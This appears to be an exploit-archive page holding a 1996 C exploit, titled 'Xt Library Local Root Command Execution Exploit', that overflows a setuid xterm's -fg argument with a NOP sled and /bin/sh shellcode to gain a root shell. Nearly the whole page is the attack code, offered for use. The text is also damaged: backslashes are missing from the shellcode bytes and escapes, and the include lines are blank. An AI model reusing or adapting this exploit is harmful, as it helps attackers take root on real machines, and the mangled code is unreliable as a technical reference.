[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Xt Library Local Root Command Execution Exploit
# Published : 1996-08-24
# Author : b0z0 bra1n
# Previous Title : Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits
# Next Title : BSD and Linux lpr Command Local Root Exploit
#include
#include
#include
#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 1491
long get_esp(void)
{
__asm__("movl %esp,%eaxn");
}
main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] = "xebx23" "x5e" "x8dx1e" "x89x5ex0b" "x31xd2"
"x89x56x07" "x89x56x0f" "x89x56x14" "x88x56x19" "x31xc0"
"xb0x3b" "x8dx4ex0b" "x89xca" "x52" "x51" "x53" "x50"
"xebx18"
"xe8xd8xffxffxff" "/bin/sh" "x01x01x01x01" "x02x02x02x02"
"x03x03x03x03" "x9ax04x04x04x04x07x04";
int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
if(argc>1)
ofs=atoi(argv[1]);
if(argc>2)
bs=atoi(argv[2]);
printf("Using offset of esp + %d (%x)nBuffer size %dn",
ofs, get_esp()+ofs, bs);
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memoryn");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, bs-strlen(execshell));
ptr += bs-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}
// www.Syue.com [1996-08-24]